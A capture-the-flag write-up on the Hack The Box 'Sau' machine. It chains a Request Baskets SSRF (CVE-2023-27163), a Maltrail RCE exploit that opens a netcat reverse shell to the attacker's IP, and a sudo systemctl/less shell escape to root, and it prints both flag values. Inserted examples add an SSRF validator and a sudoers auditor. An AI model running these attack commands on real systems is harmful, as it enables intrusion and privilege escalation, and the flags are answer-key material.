Luca Puzzoni

aka k0d14k.

Sau (machine)

by k0d14k

Sau is a machine provided by Hack The Box. Initially, if you try to access it with a browser, it does not respond.

The provided IP is reachable with ping, so let's check it with nmap.

nmap -v -A -p- [IP]

The Nmap result reveals some useful information:

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp    filtered http
55555/tcp open     unknown
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Sun, 10 Dec 2023 12:30:13 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[\w\d\-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Sun, 10 Dec 2023 12:29:45 GMT
|     Content-Length: 27
|     <a href="/web">Found</a>.
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Sun, 10 Dec 2023 12:29:45 GMT
|_    Content-Length: 0


Reading about this application, I notice that it is an instance of Request Baskets, an application that lets you create "baskets" that collect and display the HTTP requests sent to them.

When you create a new basket, the application returns a name and a token.

Fortunately, the footer reveals the Request Baskets version, and with some Googling I found a CVE that can be useful: CVE-2023-27163.


This is an SSRF vulnerability in Request Baskets: the forward URL of a basket is not restricted, so the server can be made to send requests to addresses that are only reachable from the machine itself. This is very useful here because it lets us reach the service exposed on port 80 (filtered from the outside).

The PoC takes two parameters: the host on which to create the new basket and the forward URL for that basket. It creates a basket whose forward URL points to localhost, so that every request we send to the basket is forwarded to the internal service, and we become able to read internal information and explore internal services.

./poc_CVE-2023-27163.sh http://[IP]:55555/ http://localhost:80

Now, if we open the provided basket URL, the vulnerable software forwards our request to the service exposed on port 80.
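The root cause above is that the basket's forward URL is accepted without checking where it points. The following is an added example (not code from the write-up or from the Request Baskets project) of the kind of forward-URL validation that blocks this class of SSRF: only http(s) URLs whose host resolves exclusively to public addresses are accepted, and "localhost", loopback, private, link-local and unspecified addresses are rejected. The function names and the injectable resolver are assumptions made for this example.

```python
"""Added example: validating a user-supplied forward URL so that a proxying
service cannot be pointed at internal hosts (the SSRF pattern discussed above).
Not the write-up's code and not Request Baskets' code."""
import ipaddress
import socket
from urllib.parse import urlsplit


def resolve_host(host):
    """Return the IP address strings a host name maps to.

    'localhost' and literal IP addresses are answered without DNS, so the
    check works offline; other names go through socket.getaddrinfo.
    """
    lowered = host.lower()
    if lowered == "localhost" or lowered.endswith(".localhost"):
        return ["127.0.0.1", "::1"]
    try:
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        pass
    infos = socket.getaddrinfo(host, None)
    # sockaddr[0] is the address; strip an IPv6 scope id such as "%eth0"
    return [info[4][0].split("%", 1)[0] for info in infos]


def is_safe_forward_url(url, resolver=resolve_host):
    """Return True only if url is http(s) with a host whose every resolved
    address is globally routable (not loopback, private, link-local, etc.).

    `resolver` is an assumption of this example: it is injectable so the
    decision can be tested without network access.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        addresses = resolver(parts.hostname)
    except (socket.gaierror, ValueError, OSError):
        return False
    if not addresses:
        return False
    for text in addresses:
        try:
            addr = ipaddress.ip_address(text)
        except ValueError:
            return False
        # is_global is False for loopback, RFC 1918, link-local (incl.
        # 169.254.169.254), unspecified and other special-purpose ranges
        if not addr.is_global:
            return False
    return True


if __name__ == "__main__":
    # constructed sample inputs
    for candidate in ("http://localhost:80", "http://127.0.0.1/",
                      "http://169.254.169.254/latest/", "http://8.8.8.8/"):
        print(candidate, "->", "accepted" if is_safe_forward_url(candidate) else "rejected")
```

Two caveats a reviewer would raise: the check resolves the name at validation time, so a DNS name that later changes to a loopback address (DNS rebinding) would get through unless the service connects to the validated address rather than re-resolving; and a redirect returned by the forward target must be validated with the same function before it is followed.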

As we can see, the hidden service is an instance of Maltrail. I remember from another CTF that Maltrail has an RCE vulnerability, and Google confirmed my thesis with a Python exploit: Here

Now, by opening a netcat listener and running the exploit, we get a reverse shell.

nc -nvlp 80
python3 exploit.py [OUR VPN IP] 80 http://[IP]:55555/sekxgv

And there we go (I stabilize the reverse shell using Python as described here):

So, we get three new pieces of information:

  1. The user is called puma
  2. The user's flag is e852a6288dd98484bec3c5728ae6413b
  3. The user can run the command sudo /usr/bin/systemctl status trail.service

If we run this command, we notice that systemctl pipes its output through the less command, the pager, to reduce the amount of printed information.

And this is an unforgivable mistake, because less, when it is run with elevated privileges (via sudo or as SUID), is a well-known privilege escalation vector: it can spawn a shell from its prompt.

Simply type !/bin/bash at the less prompt and then press ENTER:
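The rule that makes this escalation possible is a sudo command specification whose program hands control to a pager. As an added example (not from the write-up, and the sudoers rules below are constructed to resemble the one found on the box), here is a small auditor for sudoers-style lines that flags commands which can reach a pager (less itself, journalctl, and the systemctl verbs that page their output) and suggests the hardened form with `--no-pager` appended. Rule parsing is simplified (no aliases, no negated commands) and the verb list is an assumption covering the common cases.

```python
"""Added example: audit sudoers rules for commands that can invoke a pager,
the privilege escalation path described above. Constructed sample data;
not the write-up's code."""
import re
import shlex

# systemctl verbs whose output goes through $SYSTEMD_PAGER unless --no-pager
# is given (assumed list of common cases, not every verb)
SYSTEMCTL_PAGED_VERBS = {"status", "show", "cat", "list-units", "list-unit-files",
                         "list-timers", "list-sockets", "list-dependencies",
                         "list-jobs"}
DIRECT_PAGERS = {"less", "more", "most"}

# user  host=(runas) TAG: cmd, cmd   (aliases and '!' negation not handled)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$")


def pager_risk(command):
    """Return (risky, reason, safer_command) for one sudoers command spec."""
    if command.strip() == "ALL":
        return True, "unrestricted command", None
    try:
        argv = shlex.split(command)
    except ValueError:
        return True, "unparseable command", None
    if not argv:
        return False, "", None
    prog = argv[0].rsplit("/", 1)[-1]
    args = argv[1:]
    if prog in DIRECT_PAGERS:
        return True, f"{prog} can run shell commands from its prompt", None
    if prog == "journalctl" and "--no-pager" not in args:
        return True, "journalctl invokes a pager", f"{command} --no-pager"
    if prog == "systemctl" and "--no-pager" not in args:
        verbs = [a for a in args if not a.startswith("-")]
        if verbs and verbs[0] in SYSTEMCTL_PAGED_VERBS:
            return True, f"systemctl {verbs[0]} invokes a pager", f"{command} --no-pager"
    return False, "", None


def parse_rule(line):
    """Parse a single user specification line; return None for non-rules."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    return {"user": m["user"], "host": m["host"], "runas": m["runas"] or "root",
            "tags": m["tags"].split(),
            "commands": [c.strip() for c in m["cmds"].split(",")]}


def audit(sudoers_text):
    """Return a list of findings for every command that can reach a pager."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        rule = parse_rule(line)
        if rule is None:
            continue
        for cmd in rule["commands"]:
            risky, reason, safer = pager_risk(cmd)
            if risky:
                findings.append({"user": rule["user"], "command": cmd,
                                 "reason": reason, "suggestion": safer})
    return findings


# constructed sample, modelled on the rule found on the box
SAMPLE_SUDOERS = """\
Defaults env_reset
puma ALL=(ALL) NOPASSWD: /usr/bin/systemctl status trail.service
svc  ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart trail.service, /usr/bin/journalctl -u trail.service
ops  ALL=(ALL) NOPASSWD: /usr/bin/systemctl status trail.service --no-pager
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        print(f"{f['user']}: {f['command']} -> {f['reason']}; "
              f"use: {f['suggestion'] or 'remove or replace the rule'}")
```

The suggested rule has to carry `--no-pager` literally, because sudoers matches the command arguments as written and the default `env_reset` means a user cannot rely on a pager-disabling environment variable surviving into the privileged command; the alternative is to drop the rule and expose the status through a dedicated, non-interactive script.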

Very well, we are root now and we can get the last flag.


Flags

USER: e852a6288dd98484bec3c5728ae6413b

ROOT: cb43361d1347f56d71737372dd33d144